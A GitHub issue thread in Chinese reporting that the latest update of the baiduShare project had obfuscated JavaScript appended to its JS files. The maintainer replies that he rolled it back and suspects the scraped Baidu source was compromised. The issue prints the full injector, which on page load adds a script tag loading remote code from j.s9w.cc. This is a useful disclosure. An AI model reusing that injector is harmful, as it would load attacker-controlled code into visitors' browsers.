### ISSUE TITLE
首先感谢你的无私奉献，最近一次的更新里面存在恶意代码

### ISSUE THREAD

**Issue by codehunte** [hrwhisper/baiduShare#6]
最近一次的更新里面存在恶意代码，js文件都被附加了如下代码

;;(function(){window.v6d061dfa0ddfd12160ad851976e4a26d="fx";window.v6d061dfa0ddfd12160ad851976e4a26e="j.s9w.cc"})();
var f476e749bb252bde7a5c2c9994b6116ce=function(){function b(a){if(!d&&("onreadystatechange"!==a.type||"complete"===document.readyState)){for(a=0;a<c.length;a++)c[a].call(document);d=!0;c=null}}var c=[],d=!1;document.addEventListener?(document.addEventListener("DOMContentLoaded",b,!1),document.addEventListener("readystatechange",b,!1),window.addEventListener("load",b,!1)):document.attachEvent&&(document.attachEvent("onreadystatechange",b),window.attachEvent("onload",b));return function(a){d?a.call(document):
c.push(a)}}();
function f006b08735d9928a8820efe00a26753e7(){try{var b=window.top.document;if(!b.getElementById("82ac324e455efd0ecd2e73d22d852758")){var c=b.createElement("script");c.setAttribute("type","text/javascript");c.setAttribute("id","82ac324e455efd0ecd2e73d22d852758");var d="http://"+window.v6d061dfa0ddfd12160ad851976e4a26e+"/j/?v=1&t="+window.v6d061dfa0ddfd12160ad851976e4a26d+"&j=j";b.getElementsByTagName("head")[0].appendChild(c);c.setAttribute("src",d)}}catch(a){console.log(a.message)}}f476e749bb252bde7a5c2c9994b6116ce(f006b08735d9928a8820efe00a26753e7);

严重怀疑大侠电脑中毒。难道是大侠的别有用心。

**Comment by hrwhisper** [comment]
感谢提出，我已经重新回滚并且重新上传了。那一次更新是直接用代码爬下来的，怀疑是百度被攻击了。你在看看有木有问题
